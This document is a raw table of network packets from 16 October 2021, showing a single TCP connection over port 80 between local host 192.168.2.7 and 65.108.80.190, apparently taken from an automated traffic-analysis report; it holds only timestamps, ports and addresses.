Oct 16, 2021 16:53:25.517102957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517117023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517119884 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517132044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517143965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517160892 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517189026 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517189980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517230988 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517242908 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517271042 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517282009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517287016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517302036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517318010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517321110 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517333031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517353058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517354965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517369986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517381907 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517385960 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517400980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517409086 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517416954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517431974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517433882 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517447948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517462969 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517486095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517503977 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517503977 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517510891 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517514944 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517520905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.517541885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517564058 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.517695904 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.533205986 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.556858063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556880951 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556893110 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556905031 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556916952 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556930065 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556941986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556952953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556965113 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.556979895 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557049036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557077885 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557130098 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557149887 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557163000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557173967 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557189941 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557203054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557214022 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557215929 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557225943 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557239056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557249069 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557250023 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557261944 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557276964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557276964 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557288885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557296038 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557300091 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557312965 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557323933 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557331085 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557336092 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557348013 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557359934 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557363987 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557372093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557383060 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557393074 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557394028 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557406902 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557414055 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557418108 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557430029 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557441950 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557454109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557466030 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557483912 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557490110 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557495117 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557507992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557509899 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557513952 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557518005 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557519913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557527065 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557538986 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557558060 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557565928 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557569981 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557583094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557595015 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557605982 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557622910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557634115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557636023 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557646036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557660103 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557662964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557676077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557684898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557687998 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557704926 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557710886 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557717085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557729006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557733059 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557749033 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557760000 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557760954 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557775974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557795048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557797909 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557811975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557821989 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557828903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557841063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557846069 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557857037 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557877064 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557877064 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557895899 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557909966 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557912111 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557924032 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557929039 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557936907 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557952881 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557962894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.557964087 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557976007 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557992935 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.557997942 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558005095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558017969 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558018923 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558029890 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558042049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558053017 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558064938 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558075905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558090925 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558103085 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558115005 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558124065 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558130980 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558144093 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558157921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558159113 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558170080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558181047 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558186054 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558203936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558203936 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558216095 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558227062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558228016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558243990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558259010 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558264017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558270931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558286905 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558295965 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558299065 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558315992 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558321953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558327913 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558345079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558345079 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558361053 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558365107 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558372974 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558391094 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558399916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558408022 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558423042 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558429003 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558438063 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558456898 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558470011 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558486938 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558489084 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558511019 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558523893 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558527946 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558535099 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558554888 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558554888 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558573008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558574915 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558583975 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558600903 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558609009 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558614016 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558629990 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558645964 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558646917 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558657885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558667898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558674097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558690071 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558697939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558702946 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558718920 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558729887 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558731079 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558743954 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558754921 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558754921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558767080 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558778048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558779955 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558789968 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558805943 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558809996 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558823109 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558828115 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558840036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558851957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558856964 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558868885 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558877945 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558881044 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558897018 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558908939 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.558908939 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558943987 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.558967113 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.596525908 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596559048 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596579075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596600056 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596615076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596631050 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596652985 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596672058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596674919 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.596687078 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:25.596704006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.596708059 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.596726894 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.596743107 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.612263918 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:25.614829063 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.445132017 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.484885931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.484909058 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.484925985 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.484946012 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.484963894 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.484978914 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.484997034 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485011101 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485013008 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485028982 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485029936 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485032082 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485045910 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485055923 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485063076 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485071898 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485083103 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485130072 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485146999 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485147953 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485157013 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485162973 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485163927 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485179901 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485196114 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.485225916 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485234022 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485238075 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.485244036 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525347948 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525377035 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525393963 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525408983 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525424004 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525424957 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525440931 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525449038 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525458097 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525473118 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525491953 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525496006 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525509119 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525517941 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525526047 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525541067 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525552988 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525564909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525572062 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525576115 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525588036 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525593042 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525597095 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525599003 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525615931 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525619984 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525713921 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525727034 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525816917 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525832891 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525849104 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525887012 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525903940 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525906086 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525932074 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525950909 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525968075 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.525969982 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.525984049 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526025057 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526040077 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526073933 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526077986 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526082039 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526082993 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526084900 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526087999 CEST	49737	80	192.168.2.7	65.108.80.190
Oct 16, 2021 16:53:26.526101112 CEST	80	49737	65.108.80.190	192.168.2.7
Oct 16, 2021 16:53:26.526120901 CEST	80	49737	65.108.80.190	192.168.2.7
